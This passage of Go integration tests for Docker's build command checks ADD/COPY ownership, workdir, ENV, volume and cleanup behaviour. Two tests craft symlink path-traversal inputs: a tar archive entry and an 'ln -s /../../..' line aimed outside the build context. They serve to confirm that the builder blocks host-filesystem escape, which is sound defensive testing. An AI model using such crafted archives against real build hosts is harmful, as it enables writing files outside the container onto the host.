'{print $1}') = 'drwxr-xr-x' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Testing #5941 +func (s *DockerSuite) TestBuildAddEtcToRoot(c *check.C) { + name := "testaddetctoroot" + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` +ADD . /`, + map[string]string{ + "etc/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Testing #9401 +func (s *DockerSuite) TestBuildAddPreservesFilesSpecialBits(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddpreservesfilesspecialbits" + ctx, err := fakeContext(`FROM busybox +ADD suidbin /usr/bin/suidbin +RUN chmod 4755 /usr/bin/suidbin +RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ] +ADD ./data/ / +RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]`, + map[string]string{ + "suidbin": "suidbin", + "/data/usr/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopySingleFileToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopysinglefiletoroot" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio /exists +COPY test_file / +RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' 
] +RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Issue #3960: "ADD src ." hangs - adapted for COPY +func (s *DockerSuite) TestBuildCopySingleFileToWorkdir(c *check.C) { + name := "testcopysinglefiletoworkdir" + ctx, err := fakeContext(`FROM busybox +COPY test_file .`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + errChan := make(chan error) + go func() { + _, err := buildImageFromContext(name, ctx, true) + errChan <- err + close(errChan) + }() + select { + case <-time.After(15 * time.Second): + c.Fatal("Build with adding to workdir timed out") + case err := <-errChan: + c.Assert(err, check.IsNil) + } +} + +func (s *DockerSuite) TestBuildCopySingleFileToExistDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopysinglefiletoexistdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio /exists +COPY test_file /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopySingleFileToNonExistDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := 
"testcopysinglefiletononexistdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio /exists +COPY test_file /test_dir/ +RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyDirContentToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopydircontenttoroot" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio exists +COPY test_dir / +RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyDirContentToExistDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopydircontenttoexistdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio /exists +COPY test_dir/ /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 
'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`, + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyWholeDirToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopywholedirtoroot" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio exists +COPY test_dir /test_dir +RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyEtcToRoot(c *check.C) { + name := "testcopyetctoroot" + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` +COPY . 
/`, + map[string]string{ + "etc/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) { + testRequires(c, DaemonIsLinux) // Not currently working on Windows + + dockerfile := ` + FROM scratch + ADD links.tar / + ADD foo.txt /symlink/ + ` + targetFile := "foo.txt" + var ( + name = "test-link-absolute" + ) + ctx, err := fakeContext(dockerfile, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + tempDir, err := ioutil.TempDir("", "test-link-absolute-temp-") + if err != nil { + c.Fatalf("failed to create temporary directory: %s", tempDir) + } + defer os.RemoveAll(tempDir) + + var symlinkTarget string + if runtime.GOOS == "windows" { + var driveLetter string + if abs, err := filepath.Abs(tempDir); err != nil { + c.Fatal(err) + } else { + driveLetter = abs[:1] + } + tempDirWithoutDrive := tempDir[2:] + symlinkTarget = fmt.Sprintf(`%s:\..\..\..\..\..\..\..\..\..\..\..\..%s`, driveLetter, tempDirWithoutDrive) + } else { + symlinkTarget = fmt.Sprintf("/../../../../../../../../../../../..%s", tempDir) + } + + tarPath := filepath.Join(ctx.Dir, "links.tar") + nonExistingFile := filepath.Join(tempDir, targetFile) + fooPath := filepath.Join(ctx.Dir, targetFile) + + tarOut, err := os.Create(tarPath) + if err != nil { + c.Fatal(err) + } + + tarWriter := tar.NewWriter(tarOut) + + header := &tar.Header{ + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: symlinkTarget, + Mode: 0755, + Uid: 0, + Gid: 0, + } + + err = tarWriter.WriteHeader(header) + if err != nil { + c.Fatal(err) + } + + tarWriter.Close() + tarOut.Close() + + foo, err := os.Create(fooPath) + if err != nil { + c.Fatal(err) + } + defer foo.Close() + + if _, err := foo.WriteString("test"); err != nil { + c.Fatal(err) + } + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + if _, err 
:= os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) { + c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile) + } + +} + +func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) { + testRequires(c, DaemonIsLinux) // ln not implemented on Windows busybox + const ( + dockerfileTemplate = ` + FROM busybox + RUN ln -s /../../../../../../../../%s /x + VOLUME /x + ADD foo.txt /x/` + targetFile = "foo.txt" + ) + var ( + name = "test-link-absolute-volume" + dockerfile = "" + ) + + tempDir, err := ioutil.TempDir("", "test-link-absolute-volume-temp-") + if err != nil { + c.Fatalf("failed to create temporary directory: %s", tempDir) + } + defer os.RemoveAll(tempDir) + + dockerfile = fmt.Sprintf(dockerfileTemplate, tempDir) + nonExistingFile := filepath.Join(tempDir, targetFile) + + ctx, err := fakeContext(dockerfile, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + fooPath := filepath.Join(ctx.Dir, targetFile) + + foo, err := os.Create(fooPath) + if err != nil { + c.Fatal(err) + } + defer foo.Close() + + if _, err := foo.WriteString("test"); err != nil { + c.Fatal(err) + } + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) { + c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile) + } + +} + +// Issue #5270 - ensure we throw a better error than "unexpected EOF" +// when we can't access files in the context. +func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) { + testRequires(c, DaemonIsLinux, UnixCli) // test uses chown/chmod: not available on windows + + { + name := "testbuildinaccessiblefiles" + ctx, err := fakeContext("FROM scratch\nADD . 
/foo/", map[string]string{"fileWithoutReadAccess": "foo"}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + // This is used to ensure we detect inaccessible files early during build in the cli client + pathToFileWithoutReadAccess := filepath.Join(ctx.Dir, "fileWithoutReadAccess") + + if err = os.Chown(pathToFileWithoutReadAccess, 0, 0); err != nil { + c.Fatalf("failed to chown file to root: %s", err) + } + if err = os.Chmod(pathToFileWithoutReadAccess, 0700); err != nil { + c.Fatalf("failed to chmod file to 700: %s", err) + } + buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)) + buildCmd.Dir = ctx.Dir + out, _, err := runCommandWithOutput(buildCmd) + if err == nil { + c.Fatalf("build should have failed: %s %s", err, out) + } + + // check if we've detected the failure before we started building + if !strings.Contains(out, "no permission to read from ") { + c.Fatalf("output should've contained the string: no permission to read from but contained: %s", out) + } + + if !strings.Contains(out, "Error checking context") { + c.Fatalf("output should've contained the string: Error checking context") + } + } + { + name := "testbuildinaccessibledirectory" + ctx, err := fakeContext("FROM scratch\nADD . 
/foo/", map[string]string{"directoryWeCantStat/bar": "foo"}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + // This is used to ensure we detect inaccessible directories early during build in the cli client + pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat") + pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar") + + if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { + c.Fatalf("failed to chown directory to root: %s", err) + } + if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { + c.Fatalf("failed to chmod directory to 444: %s", err) + } + if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { + c.Fatalf("failed to chmod file to 700: %s", err) + } + + buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)) + buildCmd.Dir = ctx.Dir + out, _, err := runCommandWithOutput(buildCmd) + if err == nil { + c.Fatalf("build should have failed: %s %s", err, out) + } + + // check if we've detected the failure before we started building + if !strings.Contains(out, "can't stat") { + c.Fatalf("output should've contained the string: can't access %s", out) + } + + if !strings.Contains(out, "Error checking context") { + c.Fatalf("output should've contained the string: Error checking context\ngot:%s", out) + } + + } + { + name := "testlinksok" + ctx, err := fakeContext("FROM scratch\nADD . 
/foo/", nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + target := "../../../../../../../../../../../../../../../../../../../azA" + if err := os.Symlink(filepath.Join(ctx.Dir, "g"), target); err != nil { + c.Fatal(err) + } + defer os.Remove(target) + // This is used to ensure we don't follow links when checking if everything in the context is accessible + // This test doesn't require that we run commands as an unprivileged user + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + } + { + name := "testbuildignoredinaccessible" + ctx, err := fakeContext("FROM scratch\nADD . /foo/", + map[string]string{ + "directoryWeCantStat/bar": "foo", + ".dockerignore": "directoryWeCantStat", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + // This is used to ensure we don't try to add inaccessible files when they are ignored by a .dockerignore pattern + pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat") + pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar") + if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { + c.Fatalf("failed to chown directory to root: %s", err) + } + if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { + c.Fatalf("failed to chmod directory to 444: %s", err) + } + if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { + c.Fatalf("failed to chmod file to 700: %s", err) + } + + result := icmd.RunCmd(icmd.Cmd{ + Dir: ctx.Dir, + Command: []string{"su", "unprivilegeduser", "-c", + fmt.Sprintf("%s build -t %s .", dockerBinary, name)}, + }) + result.Assert(c, icmd.Expected{}) + } +} + +func (s *DockerSuite) TestBuildForceRm(c *check.C) { + containerCountBefore, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + name := "testbuildforcerm" + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` + RUN true + 
RUN thiswillfail`, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + dockerCmdInDir(c, ctx.Dir, "build", "-t", name, "--force-rm", ".") + + containerCountAfter, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + if containerCountBefore != containerCountAfter { + c.Fatalf("--force-rm shouldn't have left containers behind") + } + +} + +func (s *DockerSuite) TestBuildRm(c *check.C) { + name := "testbuildrm" + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` + ADD foo / + ADD foo /`, map[string]string{"foo": "bar"}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + { + containerCountBefore, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm", "-t", name, ".") + + if err != nil { + c.Fatal("failed to build the image", out) + } + + containerCountAfter, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + if containerCountBefore != containerCountAfter { + c.Fatalf("-rm shouldn't have left containers behind") + } + deleteImages(name) + } + + { + containerCountBefore, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name, ".") + + if err != nil { + c.Fatal("failed to build the image", out) + } + + containerCountAfter, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + if containerCountBefore != containerCountAfter { + c.Fatalf("--rm shouldn't have left containers behind") + } + deleteImages(name) + } + + { + containerCountBefore, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm=false", "-t", name, ".") + + if err != nil { + 
c.Fatal("failed to build the image", out) + } + + containerCountAfter, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + if containerCountBefore == containerCountAfter { + c.Fatalf("--rm=false should have left containers behind") + } + deleteImages(name) + + } + +} + +func (s *DockerSuite) TestBuildWithVolumes(c *check.C) { + testRequires(c, DaemonIsLinux) // Invalid volume paths on Windows + var ( + result map[string]map[string]struct{} + name = "testbuildvolumes" + emptyMap = make(map[string]struct{}) + expected = map[string]map[string]struct{}{ + "/test1": emptyMap, + "/test2": emptyMap, + "/test3": emptyMap, + "/test4": emptyMap, + "/test5": emptyMap, + "/test6": emptyMap, + "[/test7": emptyMap, + "/test8]": emptyMap, + } + ) + _, err := buildImage(name, + `FROM scratch + VOLUME /test1 + VOLUME /test2 + VOLUME /test3 /test4 + VOLUME ["/test5", "/test6"] + VOLUME [/test7 /test8] + `, + true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Volumes") + + err = json.Unmarshal([]byte(res), &result) + if err != nil { + c.Fatal(err) + } + + equal := reflect.DeepEqual(&result, &expected) + + if !equal { + c.Fatalf("Volumes %s, expected %s", result, expected) + } + +} + +func (s *DockerSuite) TestBuildMaintainer(c *check.C) { + name := "testbuildmaintainer" + + expected := "dockerio" + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + MAINTAINER dockerio`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Author") + if res != expected { + c.Fatalf("Maintainer %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildUser(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuilduser" + expected := "dockerio" + _, err := buildImage(name, + `FROM busybox + RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd + USER dockerio + RUN [ $(whoami) = 'dockerio' ]`, + true) + if err != nil { + c.Fatal(err) + } + res 
:= inspectField(c, name, "Config.User") + if res != expected { + c.Fatalf("User %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) { + name := "testbuildrelativeworkdir" + + var ( + expected1 string + expected2 string + expected3 string + expected4 string + expectedFinal string + ) + + if daemonPlatform == "windows" { + expected1 = `C:/` + expected2 = `C:/test1` + expected3 = `C:/test2` + expected4 = `C:/test2/test3` + expectedFinal = `C:\test2\test3` // Note inspect is going to return Windows paths, as it's not in busybox + } else { + expected1 = `/` + expected2 = `/test1` + expected3 = `/test2` + expected4 = `/test2/test3` + expectedFinal = `/test2/test3` + } + + _, err := buildImage(name, + `FROM busybox + RUN sh -c "[ "$PWD" = "`+expected1+`" ]" + WORKDIR test1 + RUN sh -c "[ "$PWD" = "`+expected2+`" ]" + WORKDIR /test2 + RUN sh -c "[ "$PWD" = "`+expected3+`" ]" + WORKDIR test3 + RUN sh -c "[ "$PWD" = "`+expected4+`" ]"`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.WorkingDir") + if res != expectedFinal { + c.Fatalf("Workdir %s, expected %s", res, expectedFinal) + } +} + +// #22181 Regression test. Single end-to-end test of using +// Windows semantics. Most path handling verifications are in unit tests +func (s *DockerSuite) TestBuildWindowsWorkdirProcessing(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildwindowsworkdirprocessing" + _, err := buildImage(name, + `FROM busybox + WORKDIR C:\\foo + WORKDIR bar + RUN sh -c "[ "$PWD" = "C:/foo/bar" ]" + `, + true) + if err != nil { + c.Fatal(err) + } +} + +// #22181 Regression test. Most paths handling verifications are in unit test. +// One functional test for end-to-end +func (s *DockerSuite) TestBuildWindowsAddCopyPathProcessing(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildwindowsaddcopypathprocessing" + // TODO Windows (@jhowardmsft). 
Needs a follow-up PR to 22181 to + // support backslash such as .\\ being equivalent to ./ and c:\\ being + // equivalent to c:/. This is not currently (nor ever has been) supported + // by docker on the Windows platform. + dockerfile := ` + FROM busybox + # No trailing slash on COPY/ADD + # Results in dir being changed to a file + WORKDIR /wc1 + COPY wc1 c:/wc1 + WORKDIR /wc2 + ADD wc2 c:/wc2 + WORKDIR c:/ + RUN sh -c "[ $(cat c:/wc1/wc1) = 'hellowc1' ]" + RUN sh -c "[ $(cat c:/wc2/wc2) = 'worldwc2' ]" + + # Trailing slash on COPY/ADD, Windows-style path. + WORKDIR /wd1 + COPY wd1 c:/wd1/ + WORKDIR /wd2 + ADD wd2 c:/wd2/ + RUN sh -c "[ $(cat c:/wd1/wd1) = 'hellowd1' ]" + RUN sh -c "[ $(cat c:/wd2/wd2) = 'worldwd2' ]" + ` + ctx, err := fakeContext(dockerfile, map[string]string{ + "wc1": "hellowc1", + "wc2": "worldwc2", + "wd1": "hellowd1", + "wd2": "worldwd2", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + _, err = buildImageFromContext(name, ctx, false) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildWorkdirWithEnvVariables(c *check.C) { + name := "testbuildworkdirwithenvvariables" + + var expected string + if daemonPlatform == "windows" { + expected = `C:\test1\test2` + } else { + expected = `/test1/test2` + } + + _, err := buildImage(name, + `FROM busybox + ENV DIRPATH /test1 + ENV SUBDIRNAME test2 + WORKDIR $DIRPATH + WORKDIR $SUBDIRNAME/$MISSING_VAR`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.WorkingDir") + if res != expected { + c.Fatalf("Workdir %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildRelativeCopy(c *check.C) { + // cat /test1/test2/foo gets permission denied for the user + testRequires(c, NotUserNamespace) + + var expected string + if daemonPlatform == "windows" { + expected = `C:/test1/test2` + } else { + expected = `/test1/test2` + } + + name := "testbuildrelativecopy" + dockerfile := ` + FROM busybox + WORKDIR /test1 + WORKDIR test2 + 
RUN sh -c "[ "$PWD" = '` + expected + `' ]" + COPY foo ./ + RUN sh -c "[ $(cat /test1/test2/foo) = 'hello' ]" + ADD foo ./bar/baz + RUN sh -c "[ $(cat /test1/test2/bar/baz) = 'hello' ]" + COPY foo ./bar/baz2 + RUN sh -c "[ $(cat /test1/test2/bar/baz2) = 'hello' ]" + WORKDIR .. + COPY foo ./ + RUN sh -c "[ $(cat /test1/foo) = 'hello' ]" + COPY foo /test3/ + RUN sh -c "[ $(cat /test3/foo) = 'hello' ]" + WORKDIR /test4 + COPY . . + RUN sh -c "[ $(cat /test4/foo) = 'hello' ]" + WORKDIR /test5/test6 + COPY foo ../ + RUN sh -c "[ $(cat /test5/foo) = 'hello' ]" + ` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + _, err = buildImageFromContext(name, ctx, false) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildBlankName(c *check.C) { + name := "testbuildblankname" + _, _, stderr, err := buildImageWithStdoutStderr(name, + `FROM busybox + ENV =`, + true) + if err == nil { + c.Fatal("Build was supposed to fail but didn't") + } + if !strings.Contains(stderr, "ENV names can not be blank") { + c.Fatalf("Missing error message, got: %s", stderr) + } + + _, _, stderr, err = buildImageWithStdoutStderr(name, + `FROM busybox + LABEL =`, + true) + if err == nil { + c.Fatal("Build was supposed to fail but didn't") + } + if !strings.Contains(stderr, "LABEL names can not be blank") { + c.Fatalf("Missing error message, got: %s", stderr) + } + + _, _, stderr, err = buildImageWithStdoutStderr(name, + `FROM busybox + ARG =foo`, + true) + if err == nil { + c.Fatal("Build was supposed to fail but didn't") + } + if !strings.Contains(stderr, "ARG names can not be blank") { + c.Fatalf("Missing error message, got: %s", stderr) + } +} + +func (s *DockerSuite) TestBuildEnv(c *check.C) { + testRequires(c, DaemonIsLinux) // ENV expansion is different in Windows + name := "testbuildenv" + expected := "[PATH=/test:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PORT=2375]" + _, 
err := buildImage(name, + `FROM busybox + ENV PATH /test:$PATH + ENV PORT 2375 + RUN [ $(env | grep PORT) = 'PORT=2375' ]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Env") + if res != expected { + c.Fatalf("Env %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildPATH(c *check.C) { + testRequires(c, DaemonIsLinux) // ENV expansion is different in Windows + + defPath := "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + + fn := func(dockerfile string, exp string) { + _, err := buildImage("testbldpath", dockerfile, true) + c.Assert(err, check.IsNil) + + res := inspectField(c, "testbldpath", "Config.Env") + + if res != exp { + c.Fatalf("Env %q, expected %q for dockerfile:%q", res, exp, dockerfile) + } + } + + tests := []struct{ dockerfile, exp string }{ + {"FROM scratch\nMAINTAINER me", "[PATH=" + defPath + "]"}, + {"FROM busybox\nMAINTAINER me", "[PATH=" + defPath + "]"}, + {"FROM scratch\nENV FOO=bar", "[PATH=" + defPath + " FOO=bar]"}, + {"FROM busybox\nENV FOO=bar", "[PATH=" + defPath + " FOO=bar]"}, + {"FROM scratch\nENV PATH=/test", "[PATH=/test]"}, + {"FROM busybox\nENV PATH=/test", "[PATH=/test]"}, + {"FROM scratch\nENV PATH=''", "[PATH=]"}, + {"FROM busybox\nENV PATH=''", "[PATH=]"}, + } + + for _, test := range tests { + fn(test.dockerfile, test.exp) + } +} + +func (s *DockerSuite) TestBuildContextCleanup(c *check.C) { + testRequires(c, SameHostDaemon) + + name := "testbuildcontextcleanup" + entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + if err != nil { + c.Fatalf("failed to list contents of tmp dir: %s", err) + } + _, err = buildImage(name, + `FROM `+minimalBaseImage()+` + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + if err != nil { + c.Fatalf("failed to list contents of tmp dir: %s", err) + } + if err = compareDirectoryEntries(entries, entriesFinal); err 
!= nil { + c.Fatalf("context should have been deleted, but wasn't") + } + +} + +func (s *DockerSuite) TestBuildContextCleanupFailedBuild(c *check.C) { + testRequires(c, SameHostDaemon) + + name := "testbuildcontextcleanup" + entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + if err != nil { + c.Fatalf("failed to list contents of tmp dir: %s", err) + } + _, err = buildImage(name, + `FROM `+minimalBaseImage()+` + RUN /non/existing/command`, + true) + if err == nil { + c.Fatalf("expected build to fail, but it didn't") + } + entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + if err != nil { + c.Fatalf("failed to list contents of tmp dir: %s", err) + } + if err = compareDirectoryEntries(entries, entriesFinal); err != nil { + c.Fatalf("context should have been deleted, but wasn't") + } + +} + +func (s *DockerSuite) TestBuildCmd(c *check.C) { + name := "testbuildcmd" + + expected := "[/bin/echo Hello World]" + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + CMD ["/bin/echo", "Hello World"]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Cmd") + if res != expected { + c.Fatalf("Cmd %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildExpose(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + name := "testbuildexpose" + expected := "map[2375/tcp:{}]" + _, err := buildImage(name, + `FROM scratch + EXPOSE 2375`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.ExposedPorts") + if res != expected { + c.Fatalf("Exposed ports %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildExposeMorePorts(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + // start building docker file with a large number of ports + portList := make([]string, 50) + line := make([]string, 100) + expectedPorts := make([]int, len(portList)*len(line)) + for i := 0; i < 
